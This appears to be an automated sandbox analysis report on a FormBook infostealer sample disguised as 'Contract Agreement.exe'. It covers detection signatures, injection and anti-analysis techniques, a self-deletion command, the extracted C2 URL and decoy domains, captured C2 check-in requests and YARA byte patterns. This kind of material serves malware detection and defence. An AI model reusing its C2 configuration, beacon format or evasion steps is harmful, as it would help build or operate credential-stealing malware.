Analysis Report Contract Agreement.exe

Overview

General Information

Sample Name: Contract Agreement.exe
Analysis ID: 385426
MD5: 75612f2e3922d80afe14068c3a510c99
SHA1: ade818e1272e6131c504273ca678ff805d01d41d
SHA256: 913b12686b62bfbaa6cd0169c2b37bb2d06d095335f3ac14047ec49d3a755b2d
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Contract Agreement.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: 75612F2E3922D80AFE14068C3A510C99)
    • Contract Agreement.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: 75612F2E3922D80AFE14068C3A510C99)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5784 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 2016 cmdline: /c del 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated on the source page; 16 entries in total)

Unpacked PEs

Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x17609:$sqlite3step: 68 34 1C 7B E1
    • 0x1771c:$sqlite3step: 68 34 1C 7B E1
    • 0x17638:$sqlite3text: 68 38 2A 90 C5
    • 0x1775d:$sqlite3text: 68 38 2A 90 C5
    • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17773:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.1.Contract Agreement.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(table truncated on the source page; 13 entries in total)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (full C2 and decoy configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Contract Agreement.exe | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE
Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.Contract Agreement.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.4bff834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.cmstp.exe.5bbc70.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.Contract Agreement.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Contract Agreement.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL | source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Contract Agreement.exe, 00000000.00000003.644430719.000000001EF60000.00000004.00000001.sdmp, Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.907753990.00000000046D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Contract Agreement.exe, cmstp.exe
Source: Binary string: cmstp.pdb | source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00405301 DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, SetFileAttributesA, DeleteFileA, FindNextFileA, FindClose, SetFileAttributesA, RemoveDirectoryA
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00405C94 SetErrorMode, SetErrorMode, FindFirstFileA, SetErrorMode, FindClose
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_004026BC FindFirstFileA
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.middlehambooks.com/klf/
Source: global traffic | HTTP traffic detected: GET /klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA HTTP/1.1 | Host: www.sapanyc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 HTTP/1.1 | Host: www.bizcert360.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: unknown | DNS traffic detected: queries for: www.sapanyc.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000002.908299208.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 0_2_00404EA0 GetDlgItem, GetDlgItem, GetDlgItem, GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageA, SendMessageA, SendMessageA, SendMessageA, SendMessageA, SendMessageA, ShowWindow, ShowWindow, GetDlgItem, SendMessageA, SendMessageA, SendMessageA, GetDlgItem, CreateThread, CloseHandle, ShowWindow, ShowWindow, ShowWindow, ShowWindow, SendMessageA, CreatePopupMenu, AppendMenuA, GetWindowRect, TrackPopupMenu, SendMessageA, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SendMessageA, lstrlenA, GlobalUnlock, SetClipboardData, CloseClipboard

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: the same 13 memory dumps (type: MEMORY) and unpacked PEs (type: UNPACKEDPE) listed under "Yara detected FormBook" in the AV Detection section above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419E10 NtReadFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419E90 NtClose
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419F40 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419D5A NtCreateFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419DB4 NtReadFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00419E0A NtReadFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A598F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A599A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A595D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A596E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A597A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A598A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59820 NtEnumerateKey
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A5B040 NtSuspendThread
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A599D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59950 NtQueueApcThread
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59A10 NtQuerySection
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A5A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59B00 NtSetValueKey
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A595F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A5AD30 NtSetContextThread
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59560 NtWriteFile
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A596D0 NtCreateKey
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59650 NtQueryValueKey
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59FE0 NtCreateMutant
Source: C:\Users\user\Desktop\Contract Agreement.exe | Code function: 1_2_00A59730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5A770 NtOpenThread,
